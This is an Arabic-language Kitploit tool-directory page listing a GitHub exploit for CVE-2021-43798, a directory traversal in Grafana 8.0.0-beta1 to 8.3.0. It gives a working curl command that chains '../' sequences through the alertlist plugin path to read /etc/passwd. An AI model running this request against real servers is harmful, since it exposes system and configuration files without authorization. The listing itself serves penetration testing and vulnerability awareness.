Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/shoxake17/cve-2021-43798
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubshoxake17/cve-2021-43798

CVE-2021-43798

استغلال لثغرة اجتياز الدليل في Grafana (CVE-2021-43798) تسمح بقراءة ملفات غير مصرح بها عبر طلبات HTTP مصممة.

عرض المستودع
2منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-43798 بواسطة Privacy Hunter

الإصدارات المتأثرة: Grafana من 8.0.0-beta1 إلى 8.3.0 (باستثناء الإصدارات المصححة)

نوع الثغرة: Directory Traversal (التنقل عبر الدلائل)

مستوى التأثير: حرج (Critical)

المنصة: Grafana (منصة مراقبة ومراقبة مفتوحة المصدر)

⚠️ تفاصيل الثغرة يمكن تنفيذ اجتياز الدليل في Grafana عبر عنوان URL التالي:

الكود

http://<grafana_host>/public/plugins// من خلال ذلك، يمكن للمهاجم قراءة الملفات المحلية على الخادم. على سبيل المثال، /etc/passwd أو الوصول غير المصرح به إلى ملفات التكوين.

🔥 مثال على الاستغلال قراءة ملف عبر طلب بسيط:

root@kitploit:~
curl http://target:3000/public/plugins/alertlist/../../../../../../../../etc/passwd

من خلال الطلب أعلاه، يمكن الحصول على قائمة مستخدمي نظام Linux.

تنزيل الأداة